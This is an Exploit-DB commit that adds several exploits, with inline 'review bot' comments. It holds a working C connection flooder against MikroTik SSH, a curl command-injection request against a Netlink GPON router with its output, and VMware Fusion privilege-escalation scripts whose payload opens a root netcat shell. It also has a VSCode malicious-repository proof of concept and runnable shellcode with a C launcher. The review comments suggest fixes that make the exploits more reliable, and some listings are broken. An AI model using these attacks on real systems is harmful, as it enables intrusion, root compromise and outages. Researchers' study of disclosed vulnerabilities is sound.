From 85cdf30ceab9e1a460a2262c06422900c5ef4648 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 19 Mar 2020 05:01:49 +0000 Subject: [PATCH] DB: 2020-03-19 7 changes to exploits/shellcodes NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path Microsoft VSCode Python Extension - Code Execution VMWare Fusion - Local Privilege Escalation Microtik SSH Daemon 6.44.3 - Denial of Service (PoC) Netlink GPON Router 1.0.11 - Remote Code Execution Windows\x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) --- exploits/hardware/remote/48228.txt | 103 ++++++++++++++++ exploits/hardware/webapps/48225.txt | 66 ++++++++++ exploits/linux/webapps/48212.txt | 2 +- exploits/macos/local/48232.md | 148 ++++++++++++++++++++++ exploits/multiple/local/48231.md | 16 +++ exploits/windows/local/48227.txt | 35 ++++++ files_exploits.csv | 5 + files_shellcodes.csv | 1 + shellcodes/windows/48229.txt | 185 ++++++++++++++++++++++++++++ 9 files changed, 560 insertions(+), 1 deletion(-) create mode 100644 exploits/hardware/remote/48228.txt create mode 100644 exploits/hardware/webapps/48225.txt create mode 100644 exploits/macos/local/48232.md create mode 100644 exploits/multiple/local/48231.md create mode 100644 exploits/windows/local/48227.txt create mode 100644 shellcodes/windows/48229.txt diff --git a/exploits/hardware/remote/48228.txt b/exploits/hardware/remote/48228.txt new file mode 100644 index 000000000..da3ac0fe1 --- /dev/null +++ b/exploits/hardware/remote/48228.txt 
@@ -0,0 +1,103 @@ +# Excploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service (PoC) +# Author: Hosein Askari +# Date: 2020-03-18 +# Vendor Homepage: https://mikrotik.com/ +# Model: hAP lite +# Processor architecture: smips +# Affected Version: through 6.44.3 +# CVE: N/A + +#Description: +An uncontrolled resource consumption vulnerability in SSH daemon on MikroTik routers through v6.44.3 could allow remote attackers to generate CPU activity, trigger refusal of new authorized connections with SIGPIPE signal(SIGPIPE is the "broken pipe" signal, which is sent to a process when it attempts to write to a pipe whose read end has closed or when it attempts to write to a socket that is no longer open for reading. The default action is to terminate the process) and cause a reboot via connect and write system calls because of uncontrolled resource management. +#details: +The issue reported in 02/25/2020 to the Mikrotik +First response by Mikrotik in 02/26/2020 +The additional information about exploit and PoC video sent in 02/26/2020 +The vulnerability is accepted by "Reinis-Jānis S" from mikrotik security team in 02/27/2020 and asked for providing the CVE number and disclosure date +#PoC: +#Mitigation: +It can be mitigated with firewall filter and service port restrictions. 
+Solution: +Hardening and tuning the daemon for these 2 parameters: +1- Number of allowed unauthenticated connections to ssh daemon +2- Maximum number of connections at which we start dropping everything for ssh daemon +PoC: +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#define MAX_CON 32 +#define MAX_THREADS 16 + +int Socket(char *ip, char *port) { + struct addrinfo hints, *ret, *p; + int sock, r; + ssize_t bytes; + char buffer[2048]; + memset(&hints, 0, sizeof(hints)); + hints.ai_family = AF_UNSPEC; + hints.ai_socktype = SOCK_STREAM; + if((r=getaddrinfo(ip, port, &hints, &ret))!=0) { + return EXIT_FAILURE; + } + for(p = ret; p != NULL; p = p->ai_next) { + if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) { + continue; + } + if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) { + close(sock); + continue; + } + break; + } + if(ret) + freeaddrinfo(ret); + fprintf(stderr, "ESTABLISHED %s:%s\n", ip, port); + return sock; +} + +void signal_callback_handler(int signum){ + printf("Caught signal SIGPIPE %d\n",signum); +} + +void mal(char *ip, char *port, int id) { + int sockets[MAX_CON]; + int i, g=1, r; + for(i=0; i!= MAX_CON; i++) + sockets[i]=0; + signal(SIGPIPE, signal_callback_handler); + while(1) { + for(i=0; i!= MAX_CON; i++) { + if(sockets[i] == 0) + sockets[i] = Socket(ip, port); + r=write(sockets[i], "\0", 1); + if(r == -1) { + close(sockets[i]); + sockets[i] = Socket(ip, port); + } + } + usleep(200000); + } +} + +int main(int argc, char **argv) { + int i; + for(i=0; i!= MAX_THREADS; i++) { + if(fork()) + mal(argv[1], argv[2], i); + usleep(200000); + } + getc(stdin); + return 0; +} +######### + +Sincerely, +Hosein Askari \ No newline at end of file diff --git a/exploits/hardware/webapps/48225.txt b/exploits/hardware/webapps/48225.txt new file mode 100644 index 000000000..7a9481ea9 --- /dev/null +++ b/exploits/hardware/webapps/48225.txt 
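Review bot: `Socket()` never reports failure in a way `mal()` can act on: the getaddrinfo branch returns `EXIT_FAILURE`, i.e. 1, which the caller then treats as a socket and writes the NUL byte to stdout, and when every `connect()` fails the loop falls through still holding the already-closed descriptor and prints `ESTABLISHED` anyway. I would `return -1;` in the getaddrinfo branch, add `if (p == NULL) { freeaddrinfo(ret); return -1; }` before the ESTABLISHED message, and skip bad descriptors in `mal()` with `if (sockets[i] < 0) { sockets[i] = 0; continue; }`. `main()` also dereferences `argv[1]`/`argv[2]` without an `argc` check, so running the PoC with no arguments crashes inside getaddrinfo rather than printing usage. The `#include` lines appear to have lost their header names in this copy (probably stripped angle brackets), so the listing will not compile as pasted.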
@@ -0,0 +1,66 @@ +# Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution +# Date: 2020-03-17 +# Exploit Author: shellord +# Vendor Homepage: https://www.netlink-india.com/ +# Version: 1.0.11 +# Tested on: Windows 10 +# CVE: N/A + +Exploit : + +curl -L -d "target_addr=;ls /&waninf=1_INTERNET_R_VID_154" +http://TARGETIP/boaform/admin/formPing + +Response : + + + + + +PINGԽ + + + + + + + + + + + + + + +
+
+

+
Finish +

+
+
+bin
+dev
+etc
+home
+image
+lib
+mnt
+proc
+sbin
+sys
+tmp
+usr
+var
+        
+ + +
+
+
+ + \ No newline at end of file diff --git a/exploits/linux/webapps/48212.txt b/exploits/linux/webapps/48212.txt index 651e5c44d..1932a8908 100644 --- a/exploits/linux/webapps/48212.txt +++ b/exploits/linux/webapps/48212.txt @@ -6,7 +6,7 @@ # Software Link: http://centos-webpanel.com/ # Version: v6 - v7 # Tested on: Kali Linux - Windows 10 -# CVE : N/A +# CVE : CVE-2020-10230 # Type: Error Based SQL Injection # Payload: diff --git a/exploits/macos/local/48232.md b/exploits/macos/local/48232.md new file mode 100644 index 000000000..37d205307 --- /dev/null +++ b/exploits/macos/local/48232.md 
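Review bot: The advisory does not say whether `/boaform/admin/formPing` is reachable without authentication — the path sits under `admin`, yet the curl command carries no cookie or credentials, so a reader cannot tell whether this is pre-auth RCE or post-auth command injection; add a line such as `# Authentication: not required (verified on firmware 1.0.11)` or its opposite, whichever was observed. The `Tested on: Windows 10` field describes the attacker's machine rather than the target, which is how that field is normally read; a separate `# Tested against: Netlink GPON router, firmware 1.0.11` line would remove the ambiguity. It would also help to state that the injection point is the unescaped `;` in `target_addr` (the shell metacharacter reaching the ping command), since the HTML dump is the only evidence of execution shown.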
@@ -0,0 +1,148 @@ +Local Privilege Escalation via VMWare Fusion + +Overview: +A directory traversal vulnerability in VMware Fusion's SUID binaries can allow +an attacker to run commands as the root user. + +Tested Versions: +* VMware Fusion 10.1.3 (9472307) on macOS 10.13.6 +* VMware Fusion 11.0.0 (10120384) on macOS 10.14.1 +* VMware Fusion 11.0.2 (10952296) on macOS 10.14.1 +* VMware Fusion 11.5.0 (14634996) on macOS 10.15.1 +* VMware Fusion 11.5.1 (15018442) on macOS 10.15.1 + +Exercising: +1) Ensure the VMware Fusion services are not running. If open, quit the VMware + Fusion GUI. +2) Run one of the exploit script (exploit_fusion.sh or exploit_usb.sh). They + will remain running until manually stopped via CTRL-c. The exploit will start + a netcat listener as root on TCP port 3333. +3) Connect to the netcat listener: nc 127.0.0.1 3333 + +Details: +This vulnerability is a directory traversal bug inside of VMware Fusion. Several +of the programs included in VMware Fusion rely on the their path on disk to find +other libraries, helper utilities, and service daemons. Two such instances of +this code pattern in SUID programs can be found in the "Open VMware Fusion +Services" executable and the "Open VMware USB Arbitrator Service" executable. +These programs try to open the service programs by looking for the files: + +Open VMware Fusion Services: +$DIRECTORY_WITH_SUID_EXECUTABLE/../../../Contents/Library/services/VMware Fusion Services +Open VMware USB Arbitrator Service: +$DIRECTORY_WITH_SUID_EXECUTABLE/../../../Contents/Library/services/VMware USB Arbitrator Service + +While ordinarily this is fine, as any attempt to copy the programs will not copy +the SUID ownership of the file and any attempt to the move the programs will +fail without root access. Furthermore symbolic links will not trick the programs +into using the new location. However, on macOS unprivileged users can create +hard links to SUID executables, which will trick the programs. 
Thus, by creating +an adequate directory layout and hard linking to the SUID programs, we can trick +them into running an executable of our choice as the root user. The included +exploit_usb.sh and exploit_fusion.sh scripts setup the correct directory +structure and hard link, compile the payload, and run the linked program in +order to start a netcat listener as root on TCP port 3333. + +In addition to the two SUID executables listed above, the SUID executable +"vmware-authd" is also vulnerable to this bug. vmware-authd tries to load two +libraries, libcrypto and libssl, from the incorrect directory. However, the two +libraries must be signed by apple or with an apple distributed signing +certificate from an organization containing the word "VMware". As such, this bug +is harder to exploit in vmware-authd. Depending on how strict Apple's developer +verification process is, it may be possible to fool Apple into granting a +matching certificate by hiding VMware within a phrase, such as with a +certificate for "Never Mind Where cloud services inc (NVMware Inc)". + +One limitation to this vulnerability is that these two vulnerable service +openers will not try to open their services if the service is already running. +Thus, the exploit will not work if the "VMware USB Arbitrator Service" and +"VMware Fusion Services" services are already running. Thus, if the VMware +Fusion GUI is open, this vulnerability cannot be exploited. However, closing the +GUI will stop the services associated with the vulnerable service openers and +make the vulnerability once again exploitable. In contrast, the library +injection attack is not subject to these restrictions (but requires the +appropriate certificate). + +As a side note, the vulnerable code is also used in VMware Workstation on Linux. +However, Linux does not allow an unprivileged user to create hard links to files +they do not own. As such, this bug is not exploitable in VMware Workstation on +Linux. 
+ +Timeline: +2019.11.12 Reported to VMware +2019.12.18 VMware confirms they can reproduce the issue +2019.12.24 Asked for status update, were told we'd get an update in early Jan +2020.01.08 Requested status update, were told fix scheduled for April 2020 +2020.01.15 Called VMware to discuss +2020.01.21 Follow up meeting with VMware to discuss +2020.03.17 VMware releases patch & public disclosure + + + + + + + + + + + + + +## exploit_fusion.sh +``` +#!/bin/sh + +# Remake the necessary folder structure +rm -rf a Contents +mkdir -p Contents/Library/services/ +mkdir -p a/b/c/ + +# Build our payload +clang payload.c -o "Contents/Library/services/VMware Fusion Services" + +# Create a hard link to the VMware SUID opener program +ln /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services a/b/c/linked + +# Run the linked program, which causes it to be confused about the path, and +# launch our payload. Additionally if our payload exits, VMware will relaunch +# it +a/b/c/linked +``` +## exploit_fusion.sh EOF + + +## exploit_usb.sh +``` +#!/bin/sh + +# Remake the necessary folder structure +rm -rf a Contents +mkdir -p Contents/Library/services/ +mkdir -p a/b/c/ + +# Build our payload +clang payload.c -o "Contents/Library/services/VMware USB Arbitrator Service" + +# Create a hard link to the VMware SUID opener program +ln /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ USB\ Arbitrator\ Service a/b/c/linked + +# Run the linked program, which causes it to be confused about the path, and +# launch our payload. Additionally if our payload exits, VMware will relaunch +# it +a/b/c/linked +``` +## exploit_usb.sh EOF + + +## payload.c +``` +#include +#include +int main(int argc, char**argv) { + setuid(0); + system("rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 3333 > /tmp/f"); + return 0; +} +``` +## payload.c EOF \ No newline at end of file 
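Review bot: `payload.c` runs `nc -l 3333` as root with no bind address, so although the write-up tells the reader to connect via `nc 127.0.0.1 3333`, the listener is reachable from any host that can route to the machine, exposing an unauthenticated root shell to the local network for as long as the exploit runs (and the write-up notes the SUID opener relaunches the payload if it exits). Bind it to loopback — `nc -l 127.0.0.1 3333`, if the bundled nc accepts a listen address — and check that the privilege change actually happened with `if (setuid(0) != 0) return 1;` rather than ignoring the return value. The fixed `/tmp/f` FIFO path is also predictable; acceptable for a PoC, but worth a one-line comment, since a pre-existing symlink at that path would redirect the root shell's I/O.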
diff --git a/exploits/multiple/local/48231.md b/exploits/multiple/local/48231.md
new file mode 100644
index 000000000..a4029b61b
--- /dev/null
+++ b/exploits/multiple/local/48231.md
@@ -0,0 +1,16 @@
+# VSCode Python Extension Code Execution
+
+This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the [Visual Studio Code](https://code.visualstudio.com/) Python extension.
+
+>TL;DR: VScode may use code from a virtualenv found in the project folders without asking the user, for things such as formatting, autocompletion, etc. This insecure design leads to arbitrary code execution by simply cloning and opening a malicious Python repository.
+
+You can read more about this vulnerability on our blog: [https://blog.doyensec.com/2020/03/16/vscode_codeexec.html](https://blog.doyensec.com/2020/03/16/vscode_codeexec.html).
+
+## HowTo
+
+- Clone the 'malicious' repository with `git clone https://github.com/doyensec/VSCode_PoC_Oct2019.git`
+- Add the cloned repo to a VSCode workspace on macOS. Note that the vulnerability affects all platforms, but the PoC is executing *Calculator.app*
+- Open `test.py` in VScode
+
+
+Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48231.zip
\ No newline at end of file
diff --git a/exploits/windows/local/48227.txt b/exploits/windows/local/48227.txt
new file mode 100644
index 000000000..e94bdba1e
--- /dev/null
+++ b/exploits/windows/local/48227.txt
@@ -0,0 +1,35 @@ +# Exploit Title: NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path +# Discovery by: Alan Mondragon "El Masas" +# Discovery Date: 2020-03-17 +# Vendor Homepage: https://www.veritas.com/ +# Software Link : https://www.veritas.com/ +# Veritas +# Tested Version: 7.0 +# Vulnerability Type: Unquoted t Service Path +# Tested on OS: Windows Server 2008 R2 en + +# Step to discover Unquoted Service Path: + + +C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Auto +NetBackup Client Service NetBackup INET Daemon + C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe + Auto +C:\>sc qc "NetBackup INET Daemon" +[SC] QueryServiceConfig SUCCESS + SERVICE_NAME: NetBackup INET Daemon + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : NetBackup Client Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +#Exploit: +# A successful attempt would require the local user to be able to insert their code in the system root path +# undetected by the OS or other security applications where it could potentially be executed during +# application startup or reboot. If successful, the local user's code would execute with the elevated +# privileges of the application. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 568c11513..de996b825 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
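Review bot: The listing shows the unquoted `BINARY_PATH_NAME` but never shows the permission check that decides whether it is exploitable: the service runs as `LocalSystem` from `C:\Program Files\Veritas\NetBackup\bin\`, so hijacking it requires an unprivileged user to create `C:\Program.exe`, `C:\Program Files\Veritas.exe` or `C:\Program Files\Veritas\NetBackup.exe`, and the default ACLs on `C:\` and `C:\Program Files` deny exactly that. Add the output of `icacls "C:\Program Files\Veritas" "C:\Program Files\Veritas\NetBackup"` (and the `C:\` / `C:\Program Files` roots) showing which of those directories, if any, grants `(W)` or `(M)` to Users or Authenticated Users; without it the finding is a precondition that depends on a separate misconfiguration, not a demonstrated privilege escalation. The `#Exploit` paragraph should name those three candidate locations instead of "insert their code in the system root path", since the root is only one of them.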
@@ -10991,6 +10991,9 @@ id,file,description,date,author,type,platform,port
 48193,exploits/windows/local/48193.txt,"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path",2020-03-11,"Roberto Piña",local,windows,
 48206,exploits/windows/local/48206.txt,"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path",2020-03-12,"Roberto Piña",local,windows,
 48211,exploits/windows/local/48211.py,"AnyBurn 4.8 - Buffer Overflow (SEH)",2020-03-13,"Richard Davy",local,windows,
+48227,exploits/windows/local/48227.txt,"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path",2020-03-18,"El Masas",local,windows,
+48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple,
+48232,exploits/macos/local/48232.md,"VMWare Fusion - Local Privilege Escalation",2020-03-17,Grimm,local,macos,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18046,6 +18049,7 @@ id,file,description,date,author,type,platform,port
 48214,exploits/hardware/remote/48214.py,"Drobo 5N2 4.1.1 - Remote Command Injection",2020-03-13,"Ian Sindermann",remote,hardware,
 48223,exploits/linux/remote/48223.rb,"Rconfig 3.x - Chained Remote Code Execution (Metasploit)",2020-03-17,Metasploit,remote,linux,
 48224,exploits/multiple/remote/48224.rb,"ManageEngine Desktop Central - Java Deserialization (Metasploit)",2020-03-17,Metasploit,remote,multiple,
+48228,exploits/hardware/remote/48228.txt,"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)",2020-03-18,FarazPajohan,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42478,3 +42482,4 @@ id,file,description,date,author,type,platform,port
 48219,exploits/php/webapps/48219.py,"PHPKB Multi-Language 9 - Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
 48220,exploits/php/webapps/48220.py,"PHPKB Multi-Language 9 - Authenticated Directory Traversal",2020-03-16,"Antonio Cannito",webapps,php,
 48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
+48225,exploits/hardware/webapps/48225.txt,"Netlink GPON Router 1.0.11 - Remote Code Execution",2020-03-18,shellord,webapps,hardware,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index b8bdbc71e..d1b7ca9e2 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
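Review bot: The new 48228 row credits `FarazPajohan`, while the header of `exploits/hardware/remote/48228.txt` added in this same commit names `Hosein Askari` as author; if the two are the same person (handle versus real name) the index should say so consistently, otherwise one of them is wrong. The row also carries the file's `Microtik` misspelling of MikroTik — the vendor name the file's own homepage line (`mikrotik.com`) uses — which hurts searchability of the index; I would write the title as `"MikroTik SSH Daemon 6.44.3 - Denial of Service (PoC)"` and apply the same correction to the file header and commit title so the three stay in step.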
@@ -1016,3 +1016,4 @@ id,file,description,date,author,type,platform
 47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows
 48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux
 48116,shellcodes/windows_x86/48116.c,"Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86
+48229,shellcodes/windows/48229.txt,"Windows\x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows
diff --git a/shellcodes/windows/48229.txt b/shellcodes/windows/48229.txt
new file mode 100644
index 000000000..94fd9912e
--- /dev/null
+++ b/shellcodes/windows/48229.txt
@@ -0,0 +1,185 @@ +# Shellcode Title: Windows\x64 Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) +# Shellcode Author: Bobby Cooke +# Date: March 2020-03-17 +# Tested On: +# Windows 10 Pro 1909 (x86): HelpPane.exe, notepad.exe, certutil.exe +# Windows 10 Pro 1909 (x86_64): mmc.exe, xwizard.exe +# [!] Will only work if MessageBoxA or MessageBoxW exist in the Import Table of the Host PE + +; Create new StackFrame + push ebp + mov ebp, esp + sub esp, 0x10 + +; Dynamically find the base address of the executable image from the PEB +; FS_Register > TEB > PEB > &ImageBase + xor ecx, ecx + mul ecx ; Clears EAX, ECX, EDX Registers + mov ebx, eax ; clear EBX Register + mov ebx, [fs:ebx+0x30] ; get PEB address = TEB+0x30 + mov ebx, [ebx+0x8] ; get Image Base Addr = PEB+0x8 + push ebx ; save &ImageBase in EBX + pop eax ; copy &ImageBase to EAX + +; Get the Address of the Import Table +; DOS_Header > PE_Signature > ImportTable + add eax, [ebx+0x3C] ; EAX = &PE_Signature + mov dl, 0x80 ; &PE_Signature+0x80 = &ImportTable_RVA + add ax, dx ; EAX = &ImportTable_RVA + mov edx, [eax] ; EDX = RVA ImportTable + add edx, ebx ; EDX = &ImportTable + add dl, 0xC ; EDX = &Name_RVA of first Imported DLL + +; Create string 'USER32' + mov cx, 0x3233 ; 23 : 3233 + push ecx ; push "23, 0x0000" + push 0x52455355 ; RESU : 52455355 + mov [ebp-0x4], esp + + +; Find the Name RVA for user32.dll within the Import Table +; ImportTable > ImportDirectoryTable > LoopNameRVA's + xor ecx, ecx ; ECX = Counter + +fUser32Name: + push edx ; EDX = &Name_RVA of first Imported DLL + xor eax, eax + mov al, 0x14 ; &Name_RVA's are every 20 bytes + mul cl ; Counter * 20 bytes + add [esp], eax + pop eax ; EAX = &Name_RVA of Nth DLL + push eax + mov esi, [ebp-0x4] ; ESI = &String + mov edi, [eax] ; EDI = RVA Name of Nth DLL + add edi, ebx ; EDI = &Name of Nth DLL + push ecx ; save counter to stack + xor ecx, ecx + cld ; clear direction flag = Process strings from left to right + mov 
cl, 0x6 ; ECX = String Length + repe cmpsb ; compare first 6 bytes of & + pop ecx ; ECX = Counter + jz foundUser32Name ; If string at &Name_RVA == "USER32", then end loop + pop eax ; Pickup String Addr to fix stack + inc ecx ; else Counter ++ + jmp short fUser32Name ; restart the loop + +foundUser32Name: + pop eax ; EAX = &Name_RVA of user32.dll + mov [ebp-0x8], eax ; [ESP-0x8] = &Name_RVA of user32.dll + sub al, 0xC ; EAX = &User32_ImportNameTable_RVA + mov eax, [eax] ; EAX = User32_ImportNameTable_RVA + add eax, ebx ; EAX = &User32_ImportNameTable + mov [ebp-0xC], eax ; [ESP-0xC] = &User32_ImportNameTable + +; Create string 'MessageBoxA' + mov ecx, 0x41786f6f ; Axoo : 41786f6f + shr ecx, 8 + push ecx ; "oxA,0x00" + push 0x42656761 ; Bega : 42656761 + push 0x7373654d ; sseM : 7373654d + + jmp Counter + +MessageBoxW: + mov byte [esp+0xA], 0x57 ; Change A to W + mov eax, [ebp-0xC] ; EAX = &User32_ImportNameTable + +; Find the Name RVA for MessageBoxA within the Import Table +; ImportTable > ImportDirectoryTable > LoopNameRVA's + +Counter: + xor ecx, ecx + +fNameLoop: + mov esi, esp ; ESI = "MessageBoxA,0x00" + xor edx, edx + mov edi, [eax] ; EDI = RVA NameString + cmp edi, edx ; See if we checked all imported function names + je MessageBoxW + add edi, ebx ; EDI = &NameString of Nth Function + inc edi ; skip the first 2 bytes - Ordinal Value + inc edi ; skip the first 2 bytes + push ecx ; push counter value + xor ecx, ecx + cld ; clear direction flag = Process strings from left to right + mov cl, 0xB ; ECX = String Length + repe cmpsb ; compare first 11 bytes + pop ecx ; ECX = Counter value + jz foundName ; If string at &NameString == "MessageBox-", then end loop + mov dl, 0x4 + add eax, edx ; Next RVA NameString of Imported User32.dll function + inc ecx ; Counter ++ + jmp short fNameLoop ; restart the loop + +foundName: + mov eax, [ebp-0x8] ; EAX = &User32_Name_RVA + add al, 0x4 ; EAX = &User32_ImportAddressTable_RVA + mov edi, [eax] ; EDI = 
User32_ImportAddressTable_RVA + add edi, ebx ; EDI = &User32_ImportNameTable + xor eax, eax + mov al, 0x4 + mul cx ; Counter * 4 = Offset MessageBoxA in Table + add eax, edi ;[EAX] = &MessageBoxA + mov eax, [eax] ; EAX = &MessageBoxA + + mov byte bl, [esp+0xA] ; DL = 'A' or 'W' + +;CALL to MessageBoxA +; hOwner = NULL +; Text = "BOKU" +; Title = "BOKU" +; Style = MB_OK|MB_APPLMODAL + xor ecx, ecx ; clear ecx register + push ecx ; string terminator 0x00 for string "BOKU" +; MessageBoxA or MessageBoxW? + cmp bl, 0x41 ; if BL = 'A', then + je MsgBoxA ; push ASCII string +; String = "B-O-K-U-" + push 0x2d552d4b ; -U-K : 2d552d4b + push 0x2d4f2d42 ; -O-B : 2d4f2d42 + mov edx, esp ; EDX = &String +UnicodeStrLoop: + inc edx ; 1st Char +1 + mov byte [edx], ch ; Null byte after ever char in Unicode String + inc edx ; Every Other Char +2 + inc ecx ; LoopCounter ++ + cmp cl, 0x4 ; If end of string, then + je pushArgs ; Push arguments to stack for MessageBox- Call + jmp short UnicodeStrLoop +MsgBoxA: + push 0x554b4f42 ; UKOB : 554b4f42 +pushArgs: + xor ecx, ecx + mov ebx, esp ; EBX = &String + push ecx + push ebx + push ebx + push ecx + call eax ; Call MessageBox- Function + +############################################################################################################################ + +#include +#include + +char code[] = \ +"\x55\x89\xe5\x83\xec\x10\x31\xc9\xf7\xe1\x89\xc3\x64\x8b\x5b\x30\x8b\x5b" +"\x08\x53\x58\x03\x43\x3c\xb2\x80\x66\x01\xd0\x8b\x10\x01\xda\x80\xc2\x0c" +"\x66\xb9\x33\x32\x51\x68\x55\x53\x45\x52\x89\x65\xfc\x31\xc9\x52\x31\xc0" +"\xb0\x14\xf6\xe1\x01\x04\x24\x58\x50\x8b\x75\xfc\x8b\x38\x01\xdf\x51\x31" +"\xc9\xfc\xb1\x06\xf3\xa6\x59\x74\x04\x58\x41\xeb\xde\x58\x89\x45\xf8\x2c" +"\x0c\x8b\x00\x01\xd8\x89\x45\xf4\xb9\x6f\x6f\x78\x41\xc1\xe9\x08\x51\x68" +"\x61\x67\x65\x42\x68\x4d\x65\x73\x73\xeb\x08\xc6\x44\x24\x0a\x57\x8b\x45" +"\xf4\x31\xc9\x89\xe6\x31\xd2\x8b\x38\x39\xd7\x74\xec\x01\xdf\x47\x47\x51" 
+"\x31\xc9\xfc\xb1\x0b\xf3\xa6\x59\x74\x07\xb2\x04\x01\xd0\x41\xeb\xe0\x8b" +"\x45\xf8\x04\x04\x8b\x38\x01\xdf\x31\xc0\xb0\x04\x66\xf7\xe1\x01\xf8\x8b" +"\x00\x8a\x5c\x24\x0a\x31\xc9\x51\x80\xfb\x41\x74\x18\x68\x4b\x2d\x55\x2d" +"\x68\x42\x2d\x4f\x2d\x89\xe2\x42\x88\x2a\x42\x41\x80\xf9\x04\x74\x07\xeb" +"\xf4\x68\x42\x4f\x4b\x55\x31\xc9\x89\xe3\x51\x53\x53\x51\xff\xd0"; + +int main(int argc, char **argv) +{ + int (*func)(); + func = (int(*)()) code; + (int)(*func)(); +} \ No newline at end of file
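Review bot: The title (and the CSV row) labels this `Windows\x64`, but every instruction in the listing is 32-bit — `push ebp`, `fs:[ebx+0x30]` for TEB→PEB and `[ebx+0x8]` for the PEB ImageBase field — and a 64-bit process reaches its PEB via `gs:[0x60]` with ImageBaseAddress at `+0x10`, so this payload can only run inside x86 (WoW64) processes on an x64 host; the header should read `Windows/x86`, and the `mmc.exe`/`xwizard.exe` entries under "x86_64" presumably refer to their SysWOW64 builds, which is worth stating. The C harness keeps the payload in a global `char code[]`, a non-executable data page once DEP is enforced, so `func()` will fault unless the build opts out of DEP; mark the buffer executable first with `DWORD old; VirtualProtect(code, sizeof code, PAGE_EXECUTE_READWRITE, &old);` and include `<windows.h>`. Two smaller points: the byte-sized adjustments `add dl, 0xC`, `sub al, 0xC` and `add al, 0x4` do not carry into the upper bytes, so an import descriptor whose address straddles a 0x100 boundary is miscomputed and a comment should state that alignment assumption; and when neither MessageBoxA nor MessageBoxW is imported the `je MessageBoxW` retry never terminates, so the `[!]` caveat should say the failure mode is a hang rather than an exit. The `#include` lines in the harness appear to have lost their header names in this copy.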